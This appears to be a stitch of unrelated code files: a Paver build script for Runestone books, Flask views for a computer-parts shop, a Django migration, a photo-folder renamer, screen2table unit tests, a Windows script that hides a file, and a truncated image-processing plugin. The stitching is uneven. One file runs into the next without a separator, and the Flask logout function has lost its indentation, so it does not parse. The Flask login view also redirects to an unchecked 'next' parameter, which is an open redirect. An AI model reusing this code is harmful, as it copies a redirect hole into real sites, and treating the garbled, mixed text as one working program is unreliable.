paver.setuputils.install_distutils_tasks()
import os, sys
from sphinxcontrib import paverutils
sys.path.append(os.getcwd())
# You will want to change these for your own environment in .gitignored paverconfig.py
try:
    from paverconfig import master_url, master_app
except ImportError:
    # BUGFIX: was a bare ``except:`` (which also swallows KeyboardInterrupt
    # and real errors inside paverconfig) and a python-2-only print statement.
    print('NOTICE: You are using default values for master_* Make your own paverconfig.py file')
    master_url = 'http://127.0.0.1:8000'
    master_app = 'runestone'
# Build configuration for each book; every Bunch names the sphinx source,
# build/output directories, the per-book conf directory, and the template
# arguments injected into the generated pages.
options(
    sphinx = Bunch(
        docroot=".",
    ),
    everyday = Bunch(
        outdir="static/everyday",
        sourcedir="everyday",
        builddir="static/everyday",
        # BUGFIX: key was misspelled 'confidir'; every other book uses 'confdir'
        confdir="everyday",
        template_args={'course_id':'everyday',
                       'login_required':'false',
                       'appname':master_app,
                       'loglevel':10,
                       'course_url':master_url }
    ),
    thinkcspy = Bunch(
        builddir="static/thinkcspy",
        sourcedir="source",
        outdir="static/thinkcspy",
        confdir="thinkcspy",
        template_args={'course_id':'thinkcspy',
                       'login_required':'false',
                       'appname':master_app,
                       'loglevel':10,
                       'course_url':master_url }
    ),
    pythonds = Bunch(
        builddir="static/pythonds",
        sourcedir="source",
        outdir="static/pythonds",
        confdir="pythonds",
        template_args={'course_id':'pythonds',
                       'login_required':'false',
                       'appname':master_app,
                       'loglevel':10,
                       'course_url':master_url }
    ),
    overview = Bunch(
        builddir="static/overview",
        sourcedir="overview",
        outdir="static/overview",
        confdir="overview",
        template_args={'course_id':'overview',
                       'login_required':'false',
                       'appname':master_app,
                       'loglevel':10,
                       'course_url':master_url }
    ),
    devcourse = Bunch(
        builddir="static/devcourse",
        sourcedir="source",
        outdir="static/devcourse",
        confdir="devcourse",
        template_args={'course_id':'devcourse',
                       'login_required':'true',
                       'appname':master_app,
                       'loglevel':10,
                       'course_url':master_url }
    )
)
@task
@cmdopts([('all','a','rebuild everything')])
def everyday(options):
    '''Build the 'everyday' book with sphinx.'''
    # -a/--all: force a complete rebuild with a fresh sphinx environment
    if 'all' in options.everyday:
        options['force_all'] = True
        options['freshenv'] = True
    paverutils.run_sphinx(options,'everyday')
@task
@cmdopts([('all','a','rebuild everything')])
def thinkcspy(options):
    '''Build the 'thinkcspy' book with sphinx.'''
    # copy the book-specific index page into the shared source tree first
    sh('cp %s/index.rst %s' % (options.thinkcspy.confdir,options.thinkcspy.sourcedir))
    # -a/--all: force a complete rebuild with a fresh sphinx environment
    if 'all' in options.thinkcspy:
        options['force_all'] = True
        options['freshenv'] = True
    paverutils.run_sphinx(options,'thinkcspy')
@task
@cmdopts([('all','a','rebuild everything')])
def pythonds(options):
    '''Build the 'pythonds' book with sphinx.'''
    # copy the book-specific index page into the shared source tree first
    sh('cp %s/index.rst %s' % (options.pythonds.confdir,options.pythonds.sourcedir))
    # -a/--all: force a complete rebuild with a fresh sphinx environment
    if 'all' in options.pythonds:
        options['force_all'] = True
        options['freshenv'] = True
    paverutils.run_sphinx(options,'pythonds')
@task
@cmdopts([('all','a','rebuild everything')])
def overview(options):
    '''Build the 'overview' book with sphinx.'''
    # -a/--all: force a complete rebuild with a fresh sphinx environment
    if 'all' in options.overview:
        options['force_all'] = True
        options['freshenv'] = True
    paverutils.run_sphinx(options,'overview')
@task
@cmdopts([('all','a','rebuild everything')])
def devcourse(options):
    '''Build the 'devcourse' book with sphinx.'''
    # copy the book-specific index page into the shared source tree first
    sh('cp %s/index.rst %s' % (options.devcourse.confdir,options.devcourse.sourcedir))
    # -a/--all: force a complete rebuild with a fresh sphinx environment
    if 'all' in options.devcourse:
        options['force_all'] = True
        options['freshenv'] = True
    paverutils.run_sphinx(options,'devcourse')
@task
@cmdopts([('all','a','rebuild everything')])
def allbooks(options):
    '''Build every book; -a propagates a full rebuild to each book task.'''
    if 'all' in options.allbooks:
        options.thinkcspy['all'] = True
        options.pythonds['all'] = True
        options.overview['all'] = True
        options.devcourse['all'] = True
    thinkcspy(options)
    pythonds(options)
    devcourse(options)
    overview(options)
|
import os
import secrets
from PIL import Image
from sqlalchemy.sql.functions import user
from shopping import app,db,bcrypt
from flask import render_template, url_for, flash, redirect,request, session
from shopping.forms import ContactForm, RegistrationForm,LoginForm, UpdateProfileForm
from shopping.models import User,Contact,Category, SubCategory,Product
from flask_login import login_user, current_user, logout_user, login_required
from sqlalchemy import insert,update,delete
import re
class footer():
    """Helper for the contact form shown in the shared page footer."""

    # Declared @staticmethod so the existing `footer.footer()` call sites
    # keep working explicitly (the original relied on class-level access).
    @staticmethod
    def footer():
        """Build the footer ContactForm; on POST, persist the enquiry.

        Returns the form so views can pass it to their templates.
        """
        contact = ContactForm()
        if request.method == 'POST':
            name = request.form['name']
            email = request.form['email']
            phone = request.form['phone']
            message = request.form['message']
            query = Contact(username=name, email=email, phone=phone, message=message)
            db.session.add(query)
            db.session.commit()
            # BUGFIX: the acknowledgement was assigned to an unused local
            # ("We go t your query...") and never shown; flash it instead.
            flash("We got your query, we'll revert back to you soon..", 'success')
        return contact
@app.route('/home',methods=['GET', 'POST'])
def home():
    """Render the landing page; POST comes from the footer contact form."""
    contact_form = footer.footer()
    if request.method == 'POST':
        return redirect(url_for('home'))
    return render_template('home.html', form=contact_form)
@app.route('/login',methods=['GET', 'POST'])
def login():
    """Authenticate a user and honour an optional ?next= redirect target."""
    if current_user.is_authenticated:
        return redirect(url_for('home'))
    form = LoginForm()
    if form.validate_on_submit():
        account = User.query.filter_by(email=form.email.data).first()
        if account and bcrypt.check_password_hash(account.password, form.password.data):
            login_user(account, remember=form.remember.data)
            # Send the user back where they came from, if a target was given.
            next_page = request.args.get('next')
            if next_page:
                return redirect(next_page)
            return redirect(url_for('home'))
        flash('Login Unsuccessful. Please check email and password', 'danger')
    return render_template('login.html', title='Login', form=form)
@app.route('/register', methods=['GET', 'POST'])
def register():
    """Create a new account, storing a bcrypt hash of the password."""
    if current_user.is_authenticated:
        return redirect(url_for('home'))
    form = RegistrationForm()
    if not form.validate_on_submit():
        return render_template('register.html', title='Register', form=form)
    pw_hash = bcrypt.generate_password_hash(form.password.data).decode('utf-8')
    new_user = User(
        username=form.username.data,
        email=form.email.data,
        phone=form.phone.data,
        password=pw_hash,
    )
    db.session.add(new_user)
    db.session.commit()
    flash('Your account has been created! You are now able to log in', 'success')
    return redirect(url_for('login'))
@app.route('/profile', methods=['GET', 'POST'])
@login_required
def profile():
    """Show and update the logged-in user's profile.

    On POST the edits are only committed after the submitted password
    matches the stored hash; otherwise the pending changes are rolled
    back and a warning is flashed.
    """
    form = UpdateProfileForm()
    if form.validate_on_submit():
        if form.picture.data:
            picture_file = save_picture(form.picture.data)
            current_user.image_file = picture_file
        current_user.username = form.username.data
        current_user.email = form.email.data
        current_user.phone = form.phone.data
        user = User.query.filter_by(email=current_user.email).first()
        # BUGFIX: the original tested `current_user` (always truthy behind
        # @login_required) and then dereferenced `user.password`, which
        # raises AttributeError whenever the lookup returns None.
        if user and bcrypt.check_password_hash(user.password, form.password.data):
            db.session.commit()
            flash('Your account has been updated!', 'success')
            return redirect(url_for('profile'))
        # Password check failed: discard the uncommitted attribute changes.
        db.session.rollback()
        flash('Profile update failed. Please check your password', 'danger')
    elif request.method == 'GET':
        form.username.data = current_user.username
        form.email.data = current_user.email
        form.phone.data = current_user.phone
    image_file = url_for('static', filename='images/profile_pics/' + current_user.image_file)
    return render_template('profile.html', title='Account',
                           image_file=image_file, form=form)
def save_picture(form_picture):
    """Store an uploaded profile picture as a 125x125 thumbnail.

    The file is written under static/images/profile_pics with a random
    hex name (original extension preserved); the generated filename is
    returned for storage on the user record.
    """
    _, extension = os.path.splitext(form_picture.filename)
    filename = secrets.token_hex(8) + extension
    destination = os.path.join(app.root_path, 'static/images/profile_pics', filename)
    thumbnail = Image.open(form_picture)
    thumbnail.thumbnail((125, 125))
    thumbnail.save(destination)
    return filename
@app.route("/logout")
@login_required
def logout():
logout_user()
return redirect(url_for('home'))
@app.route('/mother', methods=['GET', 'POST'])
def mother():
    """Render the motherboard category page with the shared footer form."""
    contact_form = footer.footer()
    if request.method == 'POST':
        return redirect(url_for('mother'))
    return render_template('mother.html', form=contact_form)
@app.route('/cpu', methods=['GET', 'POST'])
def cpu():
    """Render the CPU category page with the shared footer form."""
    contact_form = footer.footer()
    if request.method == 'POST':
        return redirect(url_for('cpu'))
    return render_template('cpu.html', form=contact_form)
@app.route('/gpu', methods=['GET', 'POST'])
def gpu():
    """Render the GPU category page with the shared footer form."""
    contact_form = footer.footer()
    if request.method == 'POST':
        return redirect(url_for('gpu'))
    return render_template('gpu.html', form=contact_form)
@app.route('/storage', methods=['GET', 'POST'])
def storage():
    """Render the storage category page with its sub-categories and products."""
    contact_form = footer.footer()
    # category_id=4 is the storage category; sub-categories 7/8/9 hold
    # SSDs, HDDs and portable disks respectively (matches template keys).
    subcategories = SubCategory.query.filter_by(category_id=4).all()
    ssd_items = Product.query.filter_by(subcategory_id=7).all()
    hdd_items = Product.query.filter_by(subcategory_id=8).all()
    pdisk_items = Product.query.filter_by(subcategory_id=9).all()
    if request.method == 'POST':
        return redirect(url_for('storage'))
    return render_template('storage.html', form=contact_form, ssd=ssd_items,
                           hdd=hdd_items, pdisk=pdisk_items, storage=subcategories)
@app.route('/cart', methods=['GET', 'POST'])
def cart():
    # Shopping-cart page; currently display-only (no cart state handled here).
    return render_template('cart.html')
@app.route('/powersupply', methods=['GET', 'POST'])
def powersupply():
    """Render the power-supply category page with the shared footer form."""
    contact_form = footer.footer()
    if request.method == 'POST':
        return redirect(url_for('powersupply'))
    return render_template('power.html', form=contact_form)
@app.route('/cooling', methods=['GET', 'POST'])
def cooling():
    """Render the cooling category page with the shared footer form."""
    contact_form = footer.footer()
    if request.method == 'POST':
        return redirect(url_for('cooling'))
    return render_template('cooling.html', form=contact_form)
@app.route('/peripherals', methods=['GET', 'POST'])
def peripherals():
    """Render the peripherals category page with the shared footer form."""
    contact_form = footer.footer()
    if request.method == 'POST':
        return redirect(url_for('peripherals'))
    return render_template('peripherals.html', form=contact_form)
@app.route('/cases', methods=['GET', 'POST'])
def cases():
    """Render the PC-case category page with the shared footer form."""
    contact_form = footer.footer()
    if request.method == 'POST':
        return redirect(url_for('cases'))
    return render_template('cases.html', form=contact_form)
@app.route('/product/<id>', methods=['GET', 'POST'])
def product(id):
    """Render the detail page for a single product.

    ``id`` arrives as a URL path segment (string) and is matched against
    the product primary key; an unknown id renders with product=None.
    """
    product = Product.query.filter_by(id=id).first()
    form = footer.footer()
    if request.method == 'POST':
        # BUGFIX: the original redirected to the 'cases' view (copy-paste
        # from the cases() route); stay on this product's own page.
        return redirect(url_for('product', id=id))
    return render_template('product.html', form=form, product=product)
|
# -*- coding: utf-8 -*-
# Generated by Django 1.9.1 on 2016-01-08 17:55
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    # Auto-generated by Django 1.9.1 (2016-01-08); applied migrations
    # should not be hand-edited. Adds the Leader model (presumably one
    # row per livetv streamer with minutes/viewers tallies — confirm
    # against app code) and the per-date Leaderboard linking to it.

    dependencies = [
        ('app', '0023_remove_userprofile_active'),
    ]
    operations = [
        migrations.CreateModel(
            name='Leader',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('livetvusername', models.CharField(max_length=40)),
                ('minutes', models.FloatField()),
                ('viewers', models.IntegerField()),
            ],
        ),
        migrations.CreateModel(
            name='Leaderboard',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('date', models.DateField()),
                ('minutes_leaders', models.ManyToManyField(related_name='minutes_leaders', to='app.Leader')),
                ('viewers_leaders', models.ManyToManyField(related_name='viewers_leaders', to='app.Leader')),
            ],
        ),
    ]
|
#!/usr/bin/env python3
"""
Photo Folder renamer - renames folders to a standardized format
Ed Salisbury <ed.salisbury@gmail.com>
Last Modified: 2020-03-23
"""
import os
import os.path
import argparse
import re
class Renamer:
    """Renames photo folders under *path* to a 'YYYY-MM-DD[ - Location]' format."""

    MONTHS = ['January', 'February', 'March', 'April', 'May', 'June', 'July', 'August', 'September',
              'October', 'November', 'December']

    def __init__(self, **kwargs):
        self.path = kwargs['path']

    def get_month_num(self, name):
        """Return the 1-based month number for an English month name.

        BUGFIX: returns None for unrecognized names instead of raising
        ValueError, so the match_* helpers (whose regexes also match
        non-month words like 'Trip 5, 2020') can fall through instead of
        crashing rename().
        """
        try:
            return self.MONTHS.index(name) + 1
        except ValueError:
            return None

    def match_underscores(self, name):
        """Convert '2020_03_23...' style names to '2020-03-23...'."""
        matches = re.match(r"(\d\d\d\d)_(\d\d)_(\d\d)(.*)", name)
        if matches:
            m = matches.groups()
            return f"{m[0]}-{m[1]}-{m[2]}{m[3]}"

    def match_months(self, name):
        """Convert 'March 5, 2020' style names to '2020-03-05'."""
        matches = re.match(r'(\w+) (\d+), (\d+)', name)
        if matches:
            month_name, day, year = matches.groups()
            month = self.get_month_num(month_name)
            if month is None:
                return None
            return f"{int(year)}-{month:02}-{int(day):02}"

    def match_location(self, name):
        """Convert 'Denver, March 5, 2020' names to '2020-03-05 - Denver'."""
        matches = re.match(r'(.*?), (\w+) (\d+), (\d+)$', name)
        if matches:
            location, month_name, day, year = matches.groups()
            month = self.get_month_num(month_name)
            if month is None:
                return None
            return f"{int(year)}-{month:02}-{int(day):02} - {location}"

    def rename(self):
        """Rename every matching folder directly under self.path.

        Existing targets are never overwritten; folders that match no
        known pattern are left alone.
        """
        for entry in os.listdir(self.path):
            new_folder = (self.match_underscores(entry)
                          or self.match_months(entry)
                          or self.match_location(entry))
            if not new_folder:
                continue
            old_path = os.path.join(self.path, entry)
            new_path = os.path.join(self.path, new_folder)
            if not os.path.exists(new_path):
                print(f"Renaming {entry} to {new_path}")
                os.rename(old_path, new_path)
if __name__ == '__main__':
    # CLI entry point: takes the directory whose child folders get renamed.
    parser = argparse.ArgumentParser(description="Renames folders that have certain formats to a standardized"
                                                 " YYYY-MM-DD format")
    parser.add_argument('path', help='directory of folders')
    args = parser.parse_args()
    renamer = Renamer(**vars(args))
    renamer.rename()
|
"""Tests for the helpers.
Do not cover a lot of (very few actually) corner cases.
But it's going to be useful for maintaining the app.
"""
import numpy as np
from numpy.testing import assert_array_equal, assert_almost_equal
from screen2table import helpers
def test_functional_culvert():
    """End-to-end culvert flow: raw screen points -> processed polygon ->
    interpolated outline -> level/width tables (real and plot) -> area."""
    sd = helpers.ScreenData(
        [797, 692, 882, 938, 858, 1011],
        [285, 520, 621, 420, 428, 226],
        'culvert'
    )
    assert sd.nb_points == 6
    sd.process_screen_culvert()
    assert_almost_equal(
        sd.xz,
        np.array([
            [797., 285.],
            [692., 520.],
            [882., 621.],
            [938., 420.],
            [858., 428.],
            [1011., 226.]
        ])
    )
    assert_almost_equal(
        sd.xz_to_plot,
        np.array([
            [797., 336.],
            [692., 101.],
            [882., 0.],
            [938., 201.],
            [858., 193.],
            [1011., 395.],
            [797., 336.]
        ])
    )
    assert_almost_equal(
        sd.xzinterp,
        np.array([
            [797., 336.],
            [736.68085106, 201.],
            [733.10638298, 193.],
            [692., 101.],
            [882., 0.],
            [910.13930348, 101.],
            [935.77114428, 193.],
            [938., 201.],
            [858., 193.],
            [864.05940594, 201.],
            [966.31188119, 336.],
            [1011., 395.],
            [797., 336.]
        ])
    )
    userparam_dict = {
        'minx': 1,
        'maxx': 2,
        'minz': 5,
        'maxz': 10,
        'angle': 0
    }
    up = helpers.UserParam(userparam_dict)
    up.validate()
    up_dict = up.convert_dict
    zw_real, zw_plot = helpers.polygon_to_levelwidth_table(
        sd.xzinterp,
        up_dict,
    )
    assert_almost_equal(
        zw_real,
        np.array([
            [5.000000000000000000e+00, 0.000000000000000000e+00],
            [6.278481012658227556e+00, 6.838222679704921703e-01],
            [7.443037974683544888e+00, 6.353127313475972482e-01],
            [7.544303797468354666e+00, 3.993058146607029180e-01],
            [9.253164556962024889e+00, 5.307582482386170586e-01],
            [1.000000000000000000e+01, 0.000000000000000000e+00]
        ])
    )
    assert_almost_equal(
        zw_plot,
        np.array([
            [5.000000000000000000e+00, 0.000000000000000000e+00],
            [6.278481012658227556e+00, -3.419111339852460851e-01],
            [7.443037974683544888e+00, -3.176563656737986241e-01],
            [7.544303797468354666e+00, -1.996529073303514590e-01],
            [9.253164556962024889e+00, -2.653791241193085293e-01],
            [1.000000000000000000e+01, 0.000000000000000000e+00],
            [9.253164556962024889e+00, 2.653791241193085293e-01],
            [7.544303797468354666e+00, 1.996529073303514590e-01],
            [7.443037974683544888e+00, 3.176563656737986241e-01],
            [6.278481012658227556e+00, 3.419111339852460851e-01],
            [5.000000000000000000e+00, 0.000000000000000000e+00]
        ])
    )
    assert helpers.calc_area(zw_real) == 2.250486091821753
def test_functional_xs():
    """End-to-end cross-section flow: screen points scaled to real
    dimensions, then total polyline length."""
    sd = helpers.ScreenData(
        [473, 1009, 1551],
        [154, 878, 457],
        'xs'
    )
    assert sd.nb_points == 3
    sd.process_screen_xs()
    userparam_dict = {
        'minx': 1,
        'maxx': 2,
        'minz': 5,
        'maxz': 10,
        'angle': 0
    }
    up = helpers.UserParam(userparam_dict)
    up.validate()
    up_dict = up.convert_dict
    xs_xz = helpers.scale_to_realdim(sd.xz, up_dict)
    assert_almost_equal(
        xs_xz,
        np.array([
            [1.000000000000000000e+00, 1.000000000000000000e+01],
            [1.497217068645640081e+00, 5.000000000000000000e+00],
            [2.000000000000000000e+00, 7.907458563535911367e+00]
        ])
    )
    assert helpers.calc_length(xs_xz) == 7.975272780439953
def test_detect_two_lines_intersection():
    """Parallel and merely-touching segments do not count as crossing;
    a true X crossing does."""
    assert helpers.ScreenData.detect_two_lines_intersection(
        [0, 0], [1, 0], [0, 1], [1, 1]
    ) is False
    assert helpers.ScreenData.detect_two_lines_intersection(
        [0, 0], [1, 1], [0, 1], [1, 1]
    ) is False
    assert helpers.ScreenData.detect_two_lines_intersection(
        [0, 0], [1, 1], [0, 1], [1, 0]
    ) is True
def test_is_self_intersecting_polyg():
    """A simple triangle is not self-intersecting; a bow-tie is."""
    sc = helpers.ScreenData(
        [0, -0.5, 0],
        [0, 0.5, 1],
        'culvert'
    )
    assert sc.is_self_intersecting_polyg() is False
    sc = helpers.ScreenData(
        [1, 0, 1, 0],
        [0, 0, 1, 1],
        'culvert'
    )
    assert sc.is_self_intersecting_polyg() is True
def test_process_screen_culvert():
    """Culvert validation: too few points, duplicated points (exact and
    with a repeated vertex), self-intersection; then a valid triangle's
    xz / flipped plot / interpolated arrays."""
    sc = helpers.ScreenData(
        [0],
        [0],
        'culvert'
    )
    sc.process_screen_culvert()
    assert sc.is_ok is False
    assert sc.dict_tkwarn['toofewpoints']['is_error'] is True
    sc = helpers.ScreenData(
        [0, 1],
        [0, 1],
        'culvert'
    )
    sc.process_screen_culvert()
    assert sc.is_ok is False
    assert sc.dict_tkwarn['toofewpoints']['is_error'] is True
    sc = helpers.ScreenData(
        [1, 0, 1, 1],
        [0, 0.5, 1, 0],
        'culvert'
    )
    sc.process_screen_culvert()
    assert sc.is_ok is False
    assert sc.dict_tkwarn['duplicates']['is_error'] is True
    sc = helpers.ScreenData(
        [1, 0, 0, 1],
        [0, 0.5, 0.5, 1],
        'culvert'
    )
    sc.process_screen_culvert()
    assert sc.is_ok is False
    assert sc.dict_tkwarn['duplicates']['is_error'] is True
    sc = helpers.ScreenData(
        [1, 0, 1, 0],
        [0, 0, 1, 1],
        'culvert'
    )
    sc.process_screen_culvert()
    assert sc.is_ok is False
    assert sc.dict_tkwarn['self_intersection']['is_error'] is True
    sc = helpers.ScreenData(
        [0, -1, 0],
        [0, -0.5, -1],
        'culvert'
    )
    sc.process_screen_culvert()
    assert sc.is_ok is True
    assert all(val['is_error'] is False for val in sc.dict_tkwarn.values())
    assert sc.nb_points == 3
    assert_array_equal(
        sc.xz,
        np.array([
            [0, 0],
            [-1, -0.5],
            [0, -1]
        ])
    )
    assert_array_equal(
        sc.xz_to_plot,
        np.array([
            [0, 0],
            [-1, 0.5],
            [0, 1],
            [0, 0]
        ])
    )
    assert_array_equal(
        sc.xzinterp,
        np.array([
            [0, 0],
            [-1, 0.5],
            [0, 1],
            [0, 0.5],
            [0, 0]
        ])
    )
def test_process_screen_xs():
    """Cross-section validation: too few points and duplicates error out;
    a valid 3-point section yields xz == xz_to_plot and no interpolation."""
    sc = helpers.ScreenData(
        [0],
        [0],
        'xs'
    )
    sc.process_screen_xs()
    assert sc.is_ok is False
    assert sc.dict_tkwarn['toofewpoints']['is_error'] is True
    sc = helpers.ScreenData(
        [1, 0, 1, 1],
        [0, 0.5, 1, 0],
        'xs'
    )
    sc.process_screen_xs()
    assert sc.is_ok is False
    assert sc.dict_tkwarn['duplicates']['is_error'] is True
    sc = helpers.ScreenData(
        [0, -1, 0],
        [0, -0.5, -1],
        'xs'
    )
    sc.process_screen_xs()
    assert sc.is_ok is True
    assert all(val['is_error'] is False for val in sc.dict_tkwarn.values())
    assert sc.xzinterp is None
    assert sc.nb_points == 3
    assert_array_equal(sc.xz, sc.xz_to_plot)
    assert_array_equal(
        sc.xz_to_plot,
        np.array([
            [0, 0],
            [-1, 0.5],
            [0, 1],
        ])
    )
def test_arr_contain_duplicates():
    """Duplicate detection on (n, 2) point arrays: rows must repeat exactly."""
    arr = np.array([
        [0, 0],
        [-0.5, 0.5],
        [0, 1],
    ])
    assert helpers.arr_contain_duplicates(arr) is False
    arr = np.array([
        [0, 0],
        [-0.5, 0.5],
        [-0.5, 0.5],
        [0, 1],
    ])
    assert helpers.arr_contain_duplicates(arr) is True
def test_flip():
    """flip mirrors the selected column (0 = x, 1 = z) about its midrange."""
    assert_array_equal(
        helpers.flip(np.array([[0, 4], [1, 3], [2, 2]]), 0),
        np.array([[2, 4], [1, 3], [0, 2]])
    )
    assert_array_equal(
        helpers.flip(np.array([[0, 4], [1, 3], [2, 2]]), 1),
        np.array([[0, 0], [1, 1], [2, 2]])
    )
def test_are_all_z_unique():
    """z-uniqueness check ignores a closing point that repeats the first;
    a genuine duplicate z elsewhere fails."""
    pg = np.array([
        [0, 0],
        [-0.5, 0.5],
        [0, 1],
        [0, 0]
    ])
    assert helpers.are_all_z_unique(pg) is True
    pg = np.array([
        [0, 0],
        [-0.5, 0.5],
        [0, 1],
    ])
    assert helpers.are_all_z_unique(pg) is True
    pg = np.array([
        [0, 0],
        [-0.5, 0.5],
        [0, 0.5],
        [0, 0]
    ])
    assert helpers.are_all_z_unique(pg) is False
def test_modify_equal_z():
    """Equal z values get jittered apart; seeded RNG makes the
    perturbation reproducible for the exact-value assertions."""
    np.random.seed(13)
    xz = np.array([
        [0, 0],
        [-1, 0.5],
        [1, 1],
        [1, 0.5]
    ])
    assert_almost_equal(
        helpers.modify_equal_z(xz),
        np.array([
            [0., 0.],
            [-1., 0.50055485],
            [1., 1.],
            [1., 0.49947561]
        ])
    )
def test_add_z_points_to_polygon():
    """Each interior z level gets a matching point inserted on the
    opposite polygon side (here z=0.5 on the closing edge)."""
    pg = np.array([
        [0, 0],
        [-0.5, 0.5],
        [0, 1],
        [0, 0]
    ])
    assert_array_equal(
        helpers.add_z_points_to_polygon(pg),
        np.array([
            [0, 0],
            [-0.5, 0.5],
            [0, 1],
            [0, 0.5],
            [0, 0]
        ])
    )
def test_linear_interp_pt():
    """Linear interpolation holds for positive and negative spans."""
    assert helpers.linear_interp_pt(0.5, 0, 1, 0, 1) == 0.5
    assert helpers.linear_interp_pt(-0.5, 0, -1, 0, -1) == -0.5
def test_UserParam():
    """Parameter validation: a sane set passes every rule; inverted
    ranges and an out-of-range angle fail all but the float rule;
    a non-numeric value fails the float rule and yields no convert_dict."""
    up = helpers.UserParam(
        {
            'minx': 0,
            'maxx': 1,
            'minz': 10,
            'maxz': 20,
            'angle': 15
        }
    )
    rule_dict = up.validate()
    for rule in rule_dict.values():
        assert rule.is_ok is True
    for param_value in up.convert_dict.values():
        assert isinstance(param_value, float)
    up = helpers.UserParam(
        {
            'minx': 1,
            'maxx': 0,
            'minz': 20,
            'maxz': 10,
            'angle': 200
        }
    )
    rule_dict = up.validate()
    for k, rule in rule_dict.items():
        if k != 'float':
            assert rule.is_ok is False
    for param_value in up.convert_dict.values():
        assert isinstance(param_value, float)
    up = helpers.UserParam(
        {
            'minx': 'a',
            'maxx': 1,
            'minz': 10,
            'maxz': 20,
            'angle': 15
        }
    )
    rule_dict = up.validate()
    assert rule_dict['float'].is_ok is False
    assert up.convert_dict is None
def test_polygon_to_levelwidth_table():
    # TODO: covered indirectly by test_functional_culvert; add a direct
    # unit test for polygon_to_levelwidth_table.
    pass
def test_polygon_to_heightwidth_table():
    """A diamond maps to the same height/width table whether or not the
    input polygon is explicitly closed."""
    pg = np.array([
        [0, 0],
        [-0.5, 0.5],
        [0, 1],
        [0.5, 0.5],
        [0, 0]
    ])
    assert_array_equal(
        helpers.polygon_to_heightwidth_table(pg),
        np.array([
            [0., 0.],
            [0.5, 1],
            [1., 0.],
        ])
    )
    pg = np.array([
        [0, 0],
        [-0.5, 0.5],
        [0, 1],
        [0.5, 0.5]
    ])
    assert_array_equal(
        helpers.polygon_to_heightwidth_table(pg),
        np.array([
            [0., 0.],
            [0.5, 1],
            [1., 0.],
        ])
    )
def test_scale_to_realdim():
    """Pixel coordinates scale into the user's real x/z ranges
    (15-degree angle correction included in the expected values)."""
    up = {
        'minx': 0,
        'maxx': 1,
        'minz': 10,
        'maxz': 20,
        'angle': 15,
    }
    pg = np.array([
        [868., 0.],
        [790.51162791, 168.],
        [749., 258.],
        [978., 168.],
        [868., 0.]
    ])
    assert_almost_equal(
        helpers.scale_to_realdim(pg, up),
        np.array([
            [0.50194399, 10.],
            [0.17509674, 16.51162791],
            [0., 20.],
            [0.96592583, 16.51162791],
            [0.50194399, 10.]
        ])
    )
def test_zw_to_plot():
    """A level/width table becomes a closed, symmetric plot outline
    (half-width mirrored about the axis)."""
    zw = np.array([[0, 0], [0.5, 1], [1, 0]])
    assert_array_equal(
        helpers.zw_to_plot(zw),
        np.array([
            [0., 0.],
            [0.5, -0.5],
            [1., 0.],
            [0.5, 0.5],
            [0., 0.]
        ])
    )
def test_remove_close_points():
    """Points closer than the threshold in BOTH coordinates are dropped
    (endpoints handled too); a large delta in either coordinate keeps
    the point."""
    zw = np.array([[0, 0], [0.05, 0.05]])
    assert_array_equal(
        helpers.remove_close_points(zw, threshold=0.1),
        np.array([[0, 0]])
    )
    zw = np.array([[0, 0], [0.05, 0.05], [0.06, 0.06], [0.16, 0.16]])
    assert_array_equal(
        helpers.remove_close_points(zw, threshold=0.1),
        np.array([[0, 0], [0.16, 0.16]])
    )
    zw = np.array([[0, 0], [0.05, 0.05], [0.995, 0.995], [1, 1]])
    assert_array_equal(
        helpers.remove_close_points(zw, threshold=0.1),
        np.array([[0, 0], [0.995, 0.995]])
    )
    zw = np.array([[0, 0], [0.05, 0.1]])
    assert_array_equal(
        helpers.remove_close_points(zw, threshold=0.1),
        np.array([[0, 0], [0.05, 0.1]])
    )
    zw = np.array([[0, 0], [0.1, 0.05]])
    assert_array_equal(
        helpers.remove_close_points(zw, threshold=0.1),
        np.array([[0, 0], [0.1, 0.05]])
    )
def test_calc_length():
    """Polyline length sums consecutive segment lengths (zero included)."""
    pl = np.array([[0, 0], [0, 1]])
    assert helpers.calc_length(pl) == 1
    pl = np.array([[0, 0], [0, 1], [0, 0]])
    assert helpers.calc_length(pl) == 2
    pl = np.array([[0, 0], [0, 0]])
    assert helpers.calc_length(pl) == 0
def test_calc_area():
    """Area from a level/width table: unit square, and a degenerate
    two-row table still integrating to 1."""
    pg = np.array([[0, 0], [0, 1], [1, 1], [1, 0]])
    assert helpers.calc_area(pg) == 1
    pg = np.array([[0, 1], [1, 1]])
    assert helpers.calc_area(pg) == 1
def test_to_clipboard_for_excel():
    """Windows-only: data lands on the clipboard as tab/CRLF separated
    text Excel can paste (requires the win32 clipboard API)."""
    from win32 import win32clipboard
    data = np.array([[0, 0], [1, 1]])
    helpers.to_clipboard_for_excel(data, decimals=1)
    win32clipboard.OpenClipboard()
    text = win32clipboard.GetClipboardData()
    assert text == '0.0\t0.0\r\n1.0\t1.0'
|
## File hider (Windows): sets the HIDDEN attribute through the Win32 API.
import ctypes
# To hide a folder instead, ask for its path first:
# pasta = input('Digite o caminho da pasta a ser ocultada, exemplo: (C:/pasta)')
# FILE_ATTRIBUTE_HIDDEN
atributo_ocultar = 0x02
# Hide a folder (uncomment together with the input above):
# retorno = ctypes.windll.kernel32.SetFileAttributesW(pasta, atributo_ocultar)
# Hide a file; SetFileAttributesW returns nonzero on success.
retorno = ctypes.windll.kernel32.SetFileAttributesW('ocultar.txt', atributo_ocultar)
if retorno:
    print('Arquivo foi ocultado')
else:
    print('Arquivo não foi ocultado')
from pyclesperanto_prototype._tier0 import Image
from pyclesperanto_prototype._tier0 import plugin_function
@plugin_function(categories=['label measurement', 'mesh'])
def draw_angle_mesh_between_touching_labels(labels : Image, angle_mesh_destination : Image = None) -> Image:
    """Starting from a label map, draw lines between touching neighbors
    resulting in a mesh.

    The end points of the lines correspond to the centroids of the labels.
    The intensity of each line corresponds to the angle, in degrees,
    between the centroids of the two labels it connects (the angle matrix
    is computed in radians and converted below).

    Parameters
    ----------
    labels : Image
    angle_mesh_destination : Image

    Returns
    -------
    angle_mesh_destination

    References
    ----------
    """
    from .._tier9 import centroids_of_labels
    from .._tier1 import generate_angle_matrix
    from .._tier1 import generate_touch_matrix
    from .._tier1 import touch_matrix_to_mesh
    from .._tier1 import multiply_images
    from .._tier2 import radians_to_degrees
    centroids = centroids_of_labels(labels)
